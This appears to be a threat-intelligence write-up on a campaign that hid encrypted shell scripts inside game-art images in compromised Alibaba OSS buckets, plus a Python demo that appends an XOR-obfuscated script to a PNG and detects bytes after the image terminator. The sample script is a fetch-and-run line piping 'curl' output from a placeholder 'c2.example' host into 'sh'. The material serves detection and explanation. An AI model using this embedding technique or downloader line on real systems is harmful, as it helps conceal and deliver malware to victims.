Alibaba OSS Buckets Compromised to Distribute Malicious Shell Scripts via Steganography

Trend Micro has identified a malicious campaign that uses the Object Storage Service (OSS) of Alibaba Cloud (also known as Aliyun) for malware distribution and illicit cryptocurrency mining. OSS is a service that lets Alibaba Cloud customers store data such as web application images and backups in the cloud.

The investigation into this campaign began on March 13th of this year, when deep web users alerted researchers that a group was distributing malicious shell scripts from OSS buckets in Alibaba Cloud. The actors uploaded over 100MB of malicious code and images (posing as artwork from computer games) to the OSS buckets, which contained over 10,000 files at the time of removal.

The initial infection vector appears to have been ads served through an online advertising network as part of a watering hole campaign. That attack was blocked by a host-based intrusion prevention system (HIPS), after which the attacker switched tactics and uploaded an additional 1GB of malicious files to the same OSS buckets.

The malicious scripts are distributed using steganography, a technique for hiding data inside image files. Here the steganography is simple: an encrypted blob containing the malicious code is appended to a larger, otherwise valid image file. Because the appended data sits after the image's own end-of-file marker, the file still renders as an ordinary picture and passes casual inspection as game artwork. Once the loader on the victim decrypts the trailing blob, the script carries out its actions, such as connecting to C&C servers to download additional malware or installing cryptocurrency-mining malware. Two points matter for defenders: the download URL belongs to a legitimate cloud storage service, so domain reputation alone will not flag it, and the appended payload is detectable by parsing the image container and checking for bytes after the terminating chunk or marker.
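As an added example (not code from the Trend Micro report or the OTX pulse), the Python below reproduces the appending technique described above and the check a defender can run over objects pulled from a suspect bucket. A minimal PNG and a JPEG marker skeleton are constructed inline, a sample shell script is obfuscated with a simple XOR (a stand-in for whatever encryption the actors actually used; the key, the script text and the `c2.example` host are placeholders), and the detector walks the PNG chunk list or JPEG marker segments to report any bytes that follow the IEND chunk or EOI marker.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_end_offset(data):
    """Walk PNG chunks; return the offset just past IEND, or None if not a well-formed PNG."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunk_end = pos + 8 + length + 4          # header + data + CRC
        if chunk_end > len(data):
            return None
        if ctype == b"IEND":
            return chunk_end
        pos = chunk_end
    return None


def jpeg_end_offset(data):
    """Walk JPEG marker segments; return the offset just past EOI (FF D9), or None if unparseable."""
    if not data.startswith(b"\xff\xd8"):
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker == 0xFF:                        # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:                        # EOI
            return pos + 2
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:   # standalone markers, no length field
            pos += 2
            continue
        if pos + 4 > len(data):
            return None
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seglen
        if marker == 0xDA:                        # SOS: skip entropy-coded data (FF00 stuffing, RSTn are not markers)
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    return None


def trailing_payload(data):
    """Bytes appended after the image's terminator: b'' if clean, None if the file is not a parseable PNG/JPEG."""
    end = png_end_offset(data) if data.startswith(PNG_SIG) else jpeg_end_offset(data)
    return None if end is None else data[end:]


# --- constructed samples (not real campaign artifacts) ---
def make_png_1x1():
    """A valid 1x1 red RGB PNG built from scratch."""
    def chunk(ctype, body):
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)     # width, height, bit depth, RGB, compression, filter, interlace
    idat = zlib.compress(b"\x00\xff\x00\x00")               # filter byte + one red pixel
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


def make_jpeg_skeleton():
    """Marker skeleton only (not a decodable picture): SOI, APP0, SOS with stuffed bytes and an RST0, EOI."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\xff\x00\x34\xff\xd0\x56"                  # FF00 stuffing and RST0 must not end the scan
    return b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9"


SAMPLE_SCRIPT = b"#!/bin/sh\ncurl -s http://c2.example/stage2 | sh\n"   # placeholder script and host
XOR_KEY = b"k3y"                                                      # placeholder key; XOR stands in for real encryption


def xor(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def make_stego_image():
    """The technique from the report: a valid image with an obfuscated script appended after IEND."""
    return make_png_1x1() + xor(SAMPLE_SCRIPT, XOR_KEY)


if __name__ == "__main__":
    for name, blob in (("clean.png", make_png_1x1()), ("clean.jpg", make_jpeg_skeleton()), ("art.png", make_stego_image())):
        extra = trailing_payload(blob)
        print(f"{name}: {len(extra)} trailing byte(s) after image terminator")
```

The decision to walk the container rather than grep for signatures matters: a JPEG may legitimately contain `FF D9` inside an EXIF thumbnail, and a PNG may carry ancillary chunks after IDAT, so only a structural parse tells you where the picture really ends. In a bucket-scanning job this check belongs next to the usual hash and YARA passes, since a trailer that decrypts to a shell script will not match any image-format rule.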

Source: Alibaba OSS Buckets Compromised to Distribute Malicious Shell Scripts via Steganography - AlienVault - Open Threat Exchange

